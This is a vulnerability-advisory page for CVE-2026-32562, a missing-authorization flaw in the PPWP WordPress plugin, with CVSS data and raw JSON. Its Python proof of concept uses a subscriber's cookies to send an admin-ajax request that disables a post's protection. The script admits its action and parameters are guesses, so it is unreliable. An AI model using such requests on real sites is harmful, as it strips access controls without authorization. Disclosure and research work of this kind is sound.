Security Vulnerability Report
中文
CVE-2026-32562 CVSS 5.4 MEDIUM

CVE-2026-32562

Published: 2026-03-25 17:17:09
Last Modified: 2026-04-29 10:17:23

Description

Missing Authorization vulnerability in WP Folio Team PPWP password-protect-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPWP: from n/a through <= 1.9.15.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PPWP <= 1.9.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-32562 # This script demonstrates the missing authorization vulnerability. # An attacker with a low-privilege account (e.g., Subscriber) can access restricted functionality. import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker's cookies (low-privilege user) cookies = { "wordpress_logged_in_...": "attacker_cookie_value" } # Payload to exploit the missing authorization check # Adjust the 'action' and parameters based on the vulnerable endpoint payload = { "action": "ppwp_update_protection", "post_id": "1", "protection_status": "0" } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit successful! Action performed without proper authorization.") print("[+] Server response:", response.text) else: print("[-] Exploit failed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32562", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:08.660", "lastModified": "2026-04-29T10:17:22.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WP Folio Team PPWP password-protect-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPWP: from n/a through <= 1.9.15."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en WP Folio Team PPWP password-protect-page permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a PPWP: desde n/a hasta &lt;= 1.9.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/password-protect-page/vulnerability/wordpress-ppwp-plugin-1-9-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}